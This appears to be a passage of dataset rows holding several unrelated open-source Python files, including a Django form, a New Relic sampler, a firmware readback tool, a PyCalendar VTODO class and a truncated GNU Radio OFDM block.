blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
54845572e238691b2b0ae40bfb43623239ce1852 | 69690c2d9dc55c2c6914662233d8917ca592a6c1 | /helpers/commas.py | ec4a0dae9140e6fe6a88e830b2faa568191218aa | [] | no_license | aaron-price/reactjo-extension-template | 6fba82d0ca82c2eb869dd81d45bb63fb27377965 | 8350fc26be7c9643f4839c995702fbe62d1650e1 | refs/heads/master | 2021-01-19T08:20:42.627541 | 2017-11-10T22:35:38 | 2017-11-10T22:35:38 | 100,652,190 | 0 | 0 | null | 2017-11-10T22:35:39 | 2017-08-17T23:07:53 | Python | UTF-8 | Python | false | false | 235 | py | # Should add commas and a space if necessary, remove if unnecessary.
def soft_comma(item1, item2):
    """Join two string fragments with ", ", normalising commas at the seam.

    A trailing comma on *item1* and a leading comma on *item2* are stripped
    before joining, so callers may pass fragments with or without commas.

    Args:
        item1: Left-hand fragment; an optional trailing ',' is removed.
        item2: Right-hand fragment; an optional leading ',' is removed.

    Returns:
        The two fragments joined by ", ".
    """
    # endswith/startswith are safe on empty strings, unlike the previous
    # item1[-1] / item2[0] indexing, which raised IndexError on "".
    if item1.endswith(','):
        item1 = item1[:-1]
    if item2.startswith(','):
        item2 = item2[1:]
    return item1 + ', ' + item2
| [
"coding.aaronp@gmail.com"
] | coding.aaronp@gmail.com |
6ae72a7c5cf7a2919d3ed71cdf606c8528f027bc | cd7ce64a07079ce50c5596b32be48a094407825b | /fatnlazyapp/forms.py | 0a00818b26b7a83395c66f82a61520c54a58dbdf | [] | no_license | rprajapati1/FindNRide | 6abbf36d2536e2abf1f8dc0aa2bc354981a7d571 | 4e592f8afc6645243b8159d497b1821ac681ab66 | refs/heads/master | 2021-01-10T04:25:40.278769 | 2015-12-23T23:21:04 | 2015-12-23T23:21:04 | 48,515,055 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | from django import forms
class GoogleForm(forms.Form):
    """Single-field form for entering a location to look up."""

    # Field keyword arguments spread over several lines for readability;
    # all values are identical to the original declaration.
    location = forms.CharField(
        widget=forms.TextInput,
        initial='Eg. Berkeley, Oakland, San Francisco etc.',
        label='location',
        required=True,
    )
    # Tag the rendered <input> element so CSS/JS can target it by id.
    location.widget.attrs.update({'id': 'form-control'})
| [
"richaprajapati@Richas-MacBook-Pro.local"
] | richaprajapati@Richas-MacBook-Pro.local |
c1594fe7488ed25aca35c72df5aa692e134f6011 | ab23a50fa60e1576b955301f9ca97ae73420276c | /Threading.py | 78f779e17257c28d7c79668432b327b5591fd037 | [] | no_license | RockfordFaurot/Git_Python | 3977643b157cc56a53ab24bcde61c790561f46c8 | 43eb82f549d9e5eb7f466c99fbb4d6d89cb72b52 | refs/heads/master | 2021-05-02T05:52:29.759909 | 2018-02-09T03:20:20 | 2018-02-09T03:20:20 | 120,848,891 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,708 | py | #create 100 widgites as fast as possible:
#get several workers to make a widget include a delay for each worker:
#start by writing to difrent documents,
#then write to the same document onec you get that figured out.
import time
import threading
#set up a file to read and write to:
#file needs to already exist in order to use "r+" read and write function
work_file = open("/Users/rockfordfaurot/Documents/Programing/Python/Git_Python/Threading_file.txt", "r+")
#create worker class:
class Worker(object):
    """Performs up to ten tasks, logging each one to the shared work_file.

    Inherits explicitly from object so it is a new-style class under
    Python 2, allowing cooperative __init__ in subclasses.
    """

    def __init__(self, pace):
        # Seconds of simulated effort spent on each task.
        self.pace = pace
        # Number of tasks completed so far.
        self.task = 0

    def run(self):
        """Work through the remaining tasks, one log entry per task."""
        while self.task < 10:
            self.task = self.task + 1
            time.sleep(self.pace)
            entry = "Task " + str(self.task) + " has been accomplished.\n"
            work_file.write(entry)
class Worker2(object):
    """Completes up to eight jobs, logging each one to the shared work_file."""

    def __init__(self, pace):
        # Seconds of simulated effort spent on each job.
        self.pace = pace
        # Number of jobs completed so far.
        self.jobs = 0

    def run(self):
        """Work through the remaining jobs, one log entry per job."""
        while self.jobs < 8:
            self.jobs = self.jobs + 1
            time.sleep(self.pace)
            entry = "Job " + str(self.jobs) + " has been completed.\n"
            work_file.write(entry)
class SuperViser(Worker):
    """Supervisor that nags the workers five times via the shared work_file.

    Subclasses Worker but deliberately overrides __init__ without chaining,
    so a supervisor tracks `count` instead of `task` state.
    """

    def __init__(self, pace):
        # Seconds between nag messages.
        self.pace = pace
        # Nags issued so far.
        self.count = 0

    def check(self):
        """Emit up to five "Work Harder!!" lines, pausing between them."""
        while self.count < 5:
            self.count = self.count + 1
            time.sleep(self.pace)
            work_file.write("Work Harder!!\n")
# Demo run: three workers write to the same output file *sequentially* —
# despite the module name, no actual threading is used here.
Jim = Worker(1)
Steve = Worker2(1.5)
Jhon = SuperViser(2)
Jim.run()
Steve.run()
Jhon.check()
work_file.close()
# You would need statements like these to perform real multithreading:
# if __name__ == '__main__':
#     NumOfThreads = 4
#     threadList = []
#     t = threading.Thread(target=function, args=(tup,))
#     t.start()
| [
"rockfordfaurot@Rockfords-MacBook-Pro.local"
] | rockfordfaurot@Rockfords-MacBook-Pro.local |
512a43263d45f6d4fbf19a27ad961a1de09eba30 | fa5cb3cb27132a330673650afa1d68dd35f15251 | /newrelic/core/thread_utilization.py | fd57ba9f86fc98a03d51ad739747f385a68950b0 | [
"Apache-2.0"
] | permissive | jbeveland27/newrelic-python-agent | 95b4fdf253915100bc62bbd143066f589efc3ab9 | 86c78370ace1eba18e05de5e37aadb880f5f3ac4 | refs/heads/main | 2023-07-12T06:40:58.741312 | 2021-08-19T23:37:14 | 2021-08-19T23:37:14 | 398,122,410 | 1 | 0 | Apache-2.0 | 2021-08-20T01:38:35 | 2021-08-20T01:38:33 | null | UTF-8 | Python | false | false | 4,451 | py | # Copyright 2010 New Relic, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
from newrelic.samplers.decorators import data_source_factory
try:
from newrelic.core._thread_utilization import ThreadUtilization
except ImportError:
ThreadUtilization = None
# Registry mapping application name -> its ThreadUtilization tracker.
_utilization_trackers = {}


def utilization_tracker(application):
    """Return the tracker registered for *application*, or None if absent."""
    tracker = _utilization_trackers.get(application)
    return tracker
class ThreadUtilizationDataSource(object):
    """Data source yielding thread-utilization metrics for one application.

    start() registers a ThreadUtilization tracker (when the C extension is
    available) and snapshots a baseline; each subsequent call of the
    instance yields Instance/Available, Instance/Used and Instance/Busy
    metrics derived from the change in the utilization counter since the
    previous call.
    """

    def __init__(self, application):
        # Application (consumer) name; also the key into the module-level
        # _utilization_trackers registry.
        self._consumer_name = application
        self._utilization_tracker = None
        self._last_timestamp = None
        self._utilization = None

    def start(self):
        """Create and register the tracker and record the baseline reading.

        No-op when the _thread_utilization C extension is unavailable
        (ThreadUtilization is None in that case).
        """
        if ThreadUtilization:
            utilization_tracker = ThreadUtilization()
            _utilization_trackers[self._consumer_name] = utilization_tracker
            self._utilization_tracker = utilization_tracker
            self._last_timestamp = time.time()
            self._utilization = self._utilization_tracker.utilization_count()

    def stop(self):
        """Discard the tracker and deregister it (best-effort)."""
        try:
            self._utilization_tracker = None
            self._last_timestamp = None
            self._utilization = None
            # Bug fix: previously deleted _utilization_trackers[self.source_name];
            # the attribute is actually named _consumer_name, so the raised
            # AttributeError was swallowed below and stopped trackers were
            # never removed from the registry (a leak).
            del _utilization_trackers[self._consumer_name]
        except Exception:
            # Deliberate best-effort cleanup: tolerate a missing registry
            # entry or a stop() without a prior start().
            pass

    def __call__(self):
        """Generator yielding (metric_name, value) pairs since the last call.

        Yields nothing until start() has installed a tracker and at least
        one handler thread has been observed.
        """
        if self._utilization_tracker is None:
            return

        now = time.time()

        # TODO This needs to be pushed down into _thread_utilization.c.
        # In doing that, need to fix up UtilizationClass count so the
        # reset is optional because in this case a read only variant is
        # needed for getting a per request custom metric of the
        # utilization during period of the request.
        #
        # TODO This currently doesn't take into consideration coroutines
        # and instance busy percentage is percentage of a single thread
        # and not of total available coroutines. Not sure whether can
        # generate something meaningful for coroutines. Also doesn't
        # work for asynchronous systems such as Twisted.

        # Utilization over the interval = delta of the cumulative counter
        # divided by elapsed wall-clock time.
        new_utilization = self._utilization_tracker.utilization_count()

        elapsed_time = now - self._last_timestamp

        utilization = new_utilization - self._utilization

        utilization = utilization / elapsed_time

        self._last_timestamp = now
        self._utilization = new_utilization

        total_threads = None

        try:
            # Recent mod_wsgi versions publish the number of actual
            # threads so we can use this real value instead of the
            # calculated value. This is important in order to get the
            # correct utilization value for mod_wsgi daemon mode as the
            # way it manages the thread pool it may not actually
            # activate all available threads if the requirement isn't
            # there for them. Thus the utilization figure will be too
            # high as would only be calculated relative to the activated
            # threads and not the total of what is actually available.
            import mod_wsgi
            total_threads = mod_wsgi.threads_per_process
        except Exception:
            # mod_wsgi not present (or an old version); fall back to the
            # tracker's own count.
            pass

        if total_threads is None:
            total_threads = self._utilization_tracker.total_threads()

        if total_threads:
            # Don't report any metrics if don't detect any threads
            # available and in use for handling web transactions,
            # otherwise we end up report zero metrics for task systems
            # such as Celery which skews the results wrongly.
            yield ('Instance/Available', total_threads)
            yield ('Instance/Used', utilization)

            # Same value as the old "total_threads and x or 0.0" idiom,
            # written as an explicit conditional expression.
            busy = utilization / total_threads if total_threads else 0.0

            yield ('Instance/Busy', busy)
@data_source_factory(name='Thread Utilization')
def thread_utilization_data_source(settings, environ):
    """Factory creating a data source bound to the consumer named in *environ*."""
    consumer_name = environ['consumer.name']
    return ThreadUtilizationDataSource(consumer_name)
| [
"opensource@newrelic.com"
] | opensource@newrelic.com |
d19bc094a12f3f31cffdb9db2d122aa856e013f6 | b4663bb969dc6c54bef96c3290d7ec59e6ff3f98 | /SeerSonic/testcase/readtest.py | dc2b53df661d6ff51fb5ec2cdb2fb32ca2517eba | [] | no_license | XiaoxingChen/iapTool | 6c78123feb178e41e788d331c548b6de20f600f1 | bb9c050e5652b4fb2d033de507d90f13329032ad | refs/heads/master | 2020-04-10T17:15:32.468525 | 2018-03-29T02:58:56 | 2018-03-29T02:58:56 | 84,140,100 | 0 | 1 | null | 2018-02-09T07:34:24 | 2017-03-07T01:34:10 | Python | UTF-8 | Python | false | false | 1,228 | py | import sys
sys.path.append('../')
sys.path.append('../../')
import os
import json
os.chdir(sys.path[0])
from time import sleep
from SeerSonic.seersoniciapdev import CSeerSonicIapDev
from chardev.udpchardev import UdpCharDev
# Read the device IP from the user config; fall back to a default on any
# failure (missing file, malformed JSON, missing key).
try:
    with open('..\\User\\ipconfig.json', 'r') as f:
        data = json.load(f)
        f.close()  # NOTE(review): redundant -- the with-block already closes f
    F4K_ip = data['inet addr']
except:  # NOTE(review): bare except also hides unrelated errors; prefer except Exception
    F4K_ip = '192.168.192.4'

# Optional firmware path from the command line; expected to end in ".ss.bin".
if(2 == len(sys.argv)):
    bin_file = sys.argv[1]
    # For a name like "*.ss.bin", chars [-7:-4] are the ".ss" marker.
    tail2 = bin_file[-7:-4]
    if tail2 != '.ss':
        print('not the firmware for seer controller, press enter to continue...')
        input()
        sys.exit()
else:
    bin_file = '../Output/Project.bin'

# Flash layout of the target MCU (0x0800xxxx looks like STM32 internal
# flash -- TODO confirm against the device datasheet).
BOOTLOADER_START_ADDR = 0x08000000
BOOTPARAM_ADDR = 0x08007800
APP_START_ADDR = 0x08008000

# Talk to the target bootloader over UDP: enter forwarding mode, read the
# application image back to disk, then jump to the app and restore the link.
chardev = UdpCharDev((F4K_ip, 15003), (F4K_ip, 15003))
udpIapDev = CSeerSonicIapDev(chardev)
udpIapDev.setforwardmode()
udpIapDev.settargetboardbootloader()
FWV = udpIapDev.getbootloaderversion()
print('firmware version V%X.%X' % (FWV >> 4, FWV & 0xF))
# udpIapDev.loadbin(bin_file, APP_START_ADDR)
udpIapDev.readbin('readback.ss.bin', APP_START_ADDR)
udpIapDev.jumpToAddress(APP_START_ADDR)
udpIapDev.resetforwardmode()
os.system('pause')  # Windows-only: wait for a key press before the console closes
sys.exit()
| [
"cxx@seer-robotics.com"
] | cxx@seer-robotics.com |
bf6231fdd8679cee283e8777cdaaf0150815235a | 3af0b6e3f192a56345c940dd80b28c7f3b5bcc42 | /python/houseOfPies.py | 2f79d08b501ff0adcde66a1dfb29a1400f7f1c4d | [] | no_license | mollygilbert389/practiceCode | 09876ae25656e0d85fd15c01733d1140f254d5a3 | 811405883327c275896cb0f6e94b95cb094e9d83 | refs/heads/master | 2023-01-14T00:50:23.093046 | 2019-09-17T20:23:50 | 2019-09-17T20:23:50 | 184,509,020 | 0 | 0 | null | 2023-01-04T00:52:20 | 2019-05-02T02:16:37 | JavaScript | UTF-8 | Python | false | false | 1,078 | py | shopping = "y"
pie_purchases = [0,0,0,0,0,0,0,0,0,0]
pie_list = ["Pecan", "Apple Crisp", "Bean", "Banoffee", "Black Bun", "Blueberry", "Buko", "Burel", "Tamale", "Lemon"]
print("Welcome to the house of Pies! Here are our pies!: ")
while shopping == "y":
print("---------------------------------------------------------")
print("(1) Pecan, (2) Apple Crisp, (3) Bean, (4) Banoffee, " +
"(5) Black Bun, (6) Blueberry, (7) Buko, (8) Burek, " +
"(9) Tamale, (10) Lemon " )
pie_choice = input("Which would you like?")
pie_purchases[int(pie_choice) -1] +=1
print("---------------------------------------------------------")
print("Great! We'll gave that " + pie_list[int(pie_choice) -1] + " right out for you.")
shopping = input("Would you like to make another purchase: (y)es or (n)o?")
print("---------------------------------------------------------")
print("You purchased: ")
for pie_index in range(len(pie_list)):
print(str(pie_purchases[pie_index]) + " " + str(pie_list[pie_index]))
| [
"msgilbert389@gmail.com"
] | msgilbert389@gmail.com |
badc3f499d4497e8cb855a63837126b58ed27f20 | 758b475451f96bb63b0fd4922beb7b6e1ed40137 | /PyCalendar/branches/server-stable/src/pycalendar/vtodo.py | 9dbe55e934316b748a5ee5e034cfe4f1126faa63 | [
"Apache-2.0"
] | permissive | svn2github/calendarserver-raw | da9f0bfa94d8080a9803eab5e4630be21645b329 | 37edd10248e8c13dc13f65ff52c72df1783e3499 | refs/heads/master | 2023-01-11T00:51:40.137861 | 2015-01-07T00:07:46 | 2015-01-07T00:07:46 | 14,276,537 | 1 | 0 | null | 2022-12-21T13:08:16 | 2013-11-10T13:09:44 | Python | UTF-8 | Python | false | false | 10,786 | py | ##
# Copyright (c) 2007-2011 Cyrus Daboo. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
from pycalendar import definitions
from pycalendar import itipdefinitions
from pycalendar.componentrecur import PyCalendarComponentRecur
from pycalendar.datetime import PyCalendarDateTime
from pycalendar.property import PyCalendarProperty
import cStringIO as StringIO
class PyCalendarVToDo(PyCalendarComponentRecur):
    """iCalendar VTODO component: a task with status, priority and due date."""

    # Completion-state constants returned by getCompletionState(),
    # ordered by display importance.
    OVERDUE = 0
    DUE_NOW = 1
    DUE_LATER = 2
    DONE = 3
    CANCELLED = 4

    @staticmethod
    def sort_for_display(e1, e2):
        """Comparator ordering two VTODO components for display.

        Orders by status, then due/completion dates, then priority, then
        start time, operating on the master instance of each component.
        """
        s1 = e1.getMaster()
        s2 = e2.getMaster()

        # Check status first (convert None -> Needs action for tests).
        # Bug fix: the original accessed "s1.self.mStatus" etc., which
        # raised AttributeError; the master's attributes are read directly.
        status1 = s1.mStatus
        status2 = s2.mStatus
        if status1 == definitions.eStatus_VToDo_None:
            status1 = definitions.eStatus_VToDo_NeedsAction
        if status2 == definitions.eStatus_VToDo_None:
            status2 = definitions.eStatus_VToDo_NeedsAction
        if status1 != status2:
            # More important ones at the top
            return status1 < status2

        # At this point the status of each is the same

        # If status is cancelled sort by start time
        if s1.mStatus == definitions.eStatus_VToDo_Cancelled:
            # Older ones at the bottom
            return s1.mStart > s2.mStart

        # If status is completed sort by completion time
        if s1.mStatus == definitions.eStatus_VToDo_Completed:
            # Older ones at the bottom
            return s1.mCompleted > s2.mCompleted

        # Check due date exists
        if s1.mHasEnd != s2.mHasEnd:
            now = PyCalendarDateTime()
            now.setToday()

            # Ones with due dates after today below ones without due dates
            if s1.hasEnd():
                return s1.mEnd <= now
            elif s2.hasEnd():
                return now < s2.mEnd

        # Check due dates if present
        if s1.mHasEnd:
            if s1.mEnd != s2.mEnd:
                # Soonest due dates above later ones
                return s1.mEnd < s2.mEnd

        # Check priority next
        if s1.mPriority != s2.mPriority:
            # Higher priority above lower ones
            return s1.mPriority < s2.mPriority

        # Just use start time - older ones at the top
        return s1.mStart < s2.mStart

    def __init__(self, parent=None):
        super(PyCalendarVToDo, self).__init__(parent=parent)
        self.mPriority = 0
        self.mStatus = definitions.eStatus_VToDo_None
        self.mPercentComplete = 0
        self.mCompleted = PyCalendarDateTime()
        self.mHasCompleted = False

    def duplicate(self, parent=None):
        """Return a deep copy of this component under *parent*."""
        other = super(PyCalendarVToDo, self).duplicate(parent=parent)
        other.mPriority = self.mPriority
        other.mStatus = self.mStatus
        other.mPercentComplete = self.mPercentComplete
        other.mCompleted = self.mCompleted.duplicate()
        other.mHasCompleted = self.mHasCompleted
        return other

    def getType(self):
        return definitions.cICalComponent_VTODO

    def getMimeComponentName(self):
        return itipdefinitions.cICalMIMEComponent_VTODO

    def addComponent(self, comp):
        """Embed a sub-component; only VALARM components are permitted."""
        if comp.getType() == definitions.cICalComponent_VALARM:
            super(PyCalendarVToDo, self).addComponent(comp)
        else:
            raise ValueError("only VALARM components may be embedded in a VTODO")

    def getStatus(self):
        return self.mStatus

    def setStatus(self, status):
        self.mStatus = status

    def getStatusText(self):
        """Return a human-readable one-line status summary for display.

        Bug fixes relative to the original: the module is imported as
        "import cStringIO as StringIO", so the buffer must be created via
        StringIO.StringIO(); the buffer API is write()/getvalue(), not
        append()/toString(); integer day/week counts must be str()-ed; and
        the cancelled branch must compare self.mStatus rather than test the
        truthiness of the status constant itself.
        """
        sout = StringIO.StringIO()

        if self.mStatus in (definitions.eStatus_VToDo_NeedsAction, definitions.eStatus_VToDo_InProcess):
            if self.hasEnd():
                # Check due date against today
                today = PyCalendarDateTime()
                today.setToday()
                if self.getEnd() > today:
                    sout.write("Due: ")
                    whendue = self.getEnd() - today
                    if (whendue.getDays() > 0) and (whendue.getDays() <= 7):
                        sout.write(str(whendue.getDays()))
                        sout.write(" days")
                    else:
                        sout.write(self.getEnd().getLocaleDate(PyCalendarDateTime.NUMERICDATE))
                elif self.getEnd() == today:
                    sout.write("Due today")
                else:
                    sout.write("Overdue: ")
                    overdue = today - self.getEnd()
                    if overdue.getWeeks() != 0:
                        sout.write(str(overdue.getWeeks()))
                        sout.write(" weeks")
                    else:
                        sout.write(str(overdue.getDays() + 1))
                        sout.write(" days")
            else:
                sout.write("Not Completed")
        elif self.mStatus == definitions.eStatus_VToDo_Completed:
            if self.hasCompleted():
                sout.write("Completed: ")
                sout.write(self.getCompleted().getLocaleDate(PyCalendarDateTime.NUMERICDATE))
            else:
                sout.write("Completed")
        elif self.mStatus == definitions.eStatus_VToDo_Cancelled:
            sout.write("Cancelled")

        return sout.getvalue()

    def getCompletionState(self):
        """Classify the task as OVERDUE/DUE_NOW/DUE_LATER/DONE/CANCELLED.

        Returns None implicitly for any unrecognised status value.
        """
        if self.mStatus in (definitions.eStatus_VToDo_NeedsAction, definitions.eStatus_VToDo_InProcess):
            if self.hasEnd():
                # Check due date against today
                today = PyCalendarDateTime()
                today.setToday()
                if self.getEnd() > today:
                    return PyCalendarVToDo.DUE_LATER
                elif self.getEnd() == today:
                    return PyCalendarVToDo.DUE_NOW
                else:
                    return PyCalendarVToDo.OVERDUE
            else:
                return PyCalendarVToDo.DUE_NOW
        elif self.mStatus == definitions.eStatus_VToDo_Completed:
            return PyCalendarVToDo.DONE
        elif self.mStatus == definitions.eStatus_VToDo_Cancelled:
            return PyCalendarVToDo.CANCELLED

    def getPriority(self):
        return self.mPriority

    def setPriority(self, priority):
        self.mPriority = priority

    def getCompleted(self):
        return self.mCompleted

    def hasCompleted(self):
        return self.mHasCompleted

    def finalise(self):
        """Load cached attribute values from the parsed properties."""
        # Do inherited
        super(PyCalendarVToDo, self).finalise()

        # Get DUE
        temp = self.loadValueDateTime(definitions.cICalProperty_DUE)
        if temp is None:
            # Try DURATION instead
            temp = self.loadValueDuration(definitions.cICalProperty_DURATION)
            if temp is not None:
                self.mEnd = self.mStart + temp
                self.mHasEnd = True
            else:
                self.mHasEnd = False
        else:
            self.mHasEnd = True
            self.mEnd = temp

        # Get PRIORITY
        self.mPriority = self.loadValueInteger(definitions.cICalProperty_PRIORITY)

        # Get STATUS
        temp = self.loadValueString(definitions.cICalProperty_STATUS)
        if temp is not None:
            if temp == definitions.cICalProperty_STATUS_NEEDS_ACTION:
                self.mStatus = definitions.eStatus_VToDo_NeedsAction
            elif temp == definitions.cICalProperty_STATUS_COMPLETED:
                self.mStatus = definitions.eStatus_VToDo_Completed
            elif temp == definitions.cICalProperty_STATUS_IN_PROCESS:
                self.mStatus = definitions.eStatus_VToDo_InProcess
            elif temp == definitions.cICalProperty_STATUS_CANCELLED:
                self.mStatus = definitions.eStatus_VToDo_Cancelled

        # Get PERCENT-COMPLETE
        self.mPercentComplete = self.loadValueInteger(definitions.cICalProperty_PERCENT_COMPLETE)

        # Get COMPLETED
        temp = self.loadValueDateTime(definitions.cICalProperty_COMPLETED)
        self.mHasCompleted = temp is not None
        if self.mHasCompleted:
            self.mCompleted = temp

    # Editing

    def editStatus(self, status):
        """Change the STATUS property, maintaining COMPLETED consistently."""
        # Only if it is different
        if self.mStatus != status:
            # Updated cached values
            self.mStatus = status

            # Remove existing STATUS & COMPLETED items
            self.removeProperties(definitions.cICalProperty_STATUS)
            self.removeProperties(definitions.cICalProperty_COMPLETED)
            self.mHasCompleted = False

            # Now create properties
            value = None
            if status == definitions.eStatus_VToDo_NeedsAction:
                value = definitions.cICalProperty_STATUS_NEEDS_ACTION
            if status == definitions.eStatus_VToDo_Completed:
                value = definitions.cICalProperty_STATUS_COMPLETED

                # Add the completed item
                self.mCompleted.setNowUTC()
                self.mHasCompleted = True
                # NOTE(review): cICalProperty_STATUS_COMPLETED is used as the
                # property NAME here; this presumably works because the STATUS
                # value string equals the "COMPLETED" property name, but
                # cICalProperty_COMPLETED would be clearer -- confirm.
                prop = PyCalendarProperty(definitions.cICalProperty_STATUS_COMPLETED, self.mCompleted)
                self.addProperty(prop)
            elif status == definitions.eStatus_VToDo_InProcess:
                value = definitions.cICalProperty_STATUS_IN_PROCESS
            elif status == definitions.eStatus_VToDo_Cancelled:
                value = definitions.cICalProperty_STATUS_CANCELLED
            prop = PyCalendarProperty(definitions.cICalProperty_STATUS, value)
            self.addProperty(prop)

    def editCompleted(self, completed):
        """Set the COMPLETED property to *completed*, normalised to UTC."""
        # Remove existing COMPLETED item
        self.removeProperties(definitions.cICalProperty_COMPLETED)
        self.mHasCompleted = False

        # Always UTC
        self.mCompleted = completed.duplicate()
        self.mCompleted.adjustToUTC()
        self.mHasCompleted = True
        # NOTE(review): same property-name question as in editStatus above.
        prop = PyCalendarProperty(definitions.cICalProperty_STATUS_COMPLETED, self.mCompleted)
        self.addProperty(prop)

    def sortedPropertyKeyOrder(self):
        """Preferred serialisation order for this component's properties."""
        return (
            definitions.cICalProperty_UID,
            definitions.cICalProperty_RECURRENCE_ID,
            definitions.cICalProperty_DTSTART,
            definitions.cICalProperty_DURATION,
            definitions.cICalProperty_DUE,
            definitions.cICalProperty_COMPLETED,
        )
| [
"cyrusdaboo@e27351fd-9f3e-4f54-a53b-843176b1656c"
] | cyrusdaboo@e27351fd-9f3e-4f54-a53b-843176b1656c |
5de0ced8f29a970a49932adc2ba0eeadfd743a9d | 4791a6b7dd1e74ef8037ac017145a1e0b9adbe10 | /GNU-Radio-Repositories/LEGACY/gr-ofdm-rx/python/SynchAndChanEst.py | 08c9a7ba973bff975f2e7de2ffd89acb28d722ab | [] | no_license | tayloreisman16/LTE-GNU-Radio-Code | c76fe451296db5ef11e01f012a6c06514810a523 | e3aabec57e8f02cfaec55d0e774c00b4ee818758 | refs/heads/main | 2023-06-22T03:37:13.691881 | 2021-07-22T19:40:10 | 2021-07-22T19:40:10 | 329,785,446 | 1 | 0 | null | 2021-04-02T23:05:53 | 2021-01-15T02:13:36 | Python | UTF-8 | Python | false | false | 10,548 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2018 <+YOU OR YOUR COMPANY+>.
#
# This is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
import numpy as np
import pickle
import datetime
from gnuradio import gr
file_name = 'chan_est_time.pckl'
class SynchAndChanEst(gr.sync_block):
    """GNU Radio sync block: OFDM time synchronisation and channel estimation.

    Correlates the received stream against a Zadoff-Chu synch sequence to
    find frame timing, forms an MMSE-style channel estimate at the synch
    bins, then equalises the following data symbol and writes the equalised
    data bins to the output stream.

    Args:
        num_ofdm_symb: OFDM symbols per frame.
        nfft: FFT size.
        cp_len: cyclic-prefix length in samples.
        num_synch_bins: number of occupied synch subcarriers.
        synch_dat: symbol layout, e.g. [1, 1] or [2, 1]
            (synch symbols, data symbols).
        num_data_bins: number of occupied data subcarriers.
        SNR: assumed linear SNR used for MMSE regularisation.
        directory_name, file_name_cest: where to pickle the time-domain
            channel estimate when diagnostics is enabled.
        diagnostics: 1 to dump channel estimates to disk.
    """
    def __init__(self, num_ofdm_symb, nfft, cp_len, num_synch_bins, synch_dat, num_data_bins, SNR, directory_name, file_name_cest, diagnostics):
        self.num_ofdm_symb = num_ofdm_symb
        self.nfft = nfft
        self.cp_len = cp_len
        self.num_synch_bins = num_synch_bins

        # Occupied synch bins: symmetric around DC, excluding bin 0 (DC);
        # first as signed indices, then mapped to positive FFT indices.
        self.synch_bins_used_N = (list(range(-int(self.num_synch_bins / 2), 0, 1)) +
                                  list(range(1, int(self.num_synch_bins / 2) + 1, 1)))
        self.synch_bins_used_P = list((np.array(self.synch_bins_used_N) + self.nfft) % self.nfft)
        self.L_synch = len(self.synch_bins_used_P)

        self.synch_dat = synch_dat  # e.g. [1, 1] or [2, 1]
        self.M = [self.synch_dat[0], self.num_synch_bins]
        self.MM = np.prod(self.M)

        # Zadoff-Chu reference of length MM with root p, using the standard
        # even/odd-length phase polynomials (n^2 vs n(n+1)).
        self.p = 37
        if self.num_synch_bins % 2 == 0:
            tmp0 = np.array(range(self.MM))
            xx = tmp0 * tmp0
        elif self.num_synch_bins % 2 == 1:
            tmp0 = np.array(range(self.MM))
            xx = tmp0 * (tmp0+1)
        tmpvsynch = [(-1j * (2 * np.pi / self.MM) * self.p / 2.0) * kk for kk in xx]
        self.zadoff_chu = np.exp(tmpvsynch)

        self.num_data_bins = num_data_bins
        # Occupied data bins, constructed the same way as the synch bins.
        self.bins_used_N = (list(range(-int(self.num_data_bins / 2), 0, 1)) +
                            list(range(1, int(self.num_data_bins / 2) + 1, 1)))
        self.bins_used_P = list((np.array(self.bins_used_N) + self.nfft) % self.nfft)

        # Index of the most recent accepted correlation peak (-1 = none yet).
        self.cor_obs = -1
        # Phase-rotation hypotheses for each candidate timing offset within
        # one cyclic prefix: one row per offset, tiled across synch symbols.
        self.del_mat_exp = np.tile(np.exp((1j * (2.0 * np.pi / self.nfft)) * (
            np.outer(list(range(self.cp_len + 1)), list(self.synch_bins_used_P)))), (1, self.M[0]))
        self.stride_val = self.cp_len - 1  # search step through the input stream
        self.start_samp = self.cp_len
        self.rx_b_len = self.nfft + self.cp_len  # samples per OFDM symbol incl. CP

        # Pre-allocated result buffers: one row per detected correlation.
        self.max_num_corr = 100
        self.time_synch_ref = np.zeros((self.max_num_corr, 3))
        self.est_chan_time = np.zeros((self.max_num_corr, self.nfft), dtype=complex)
        self.est_synch_freq = np.zeros((self.max_num_corr, len(self.zadoff_chu)), dtype=complex)
        self.est_chan_freq_P = np.zeros((self.max_num_corr, self.nfft), dtype=complex)
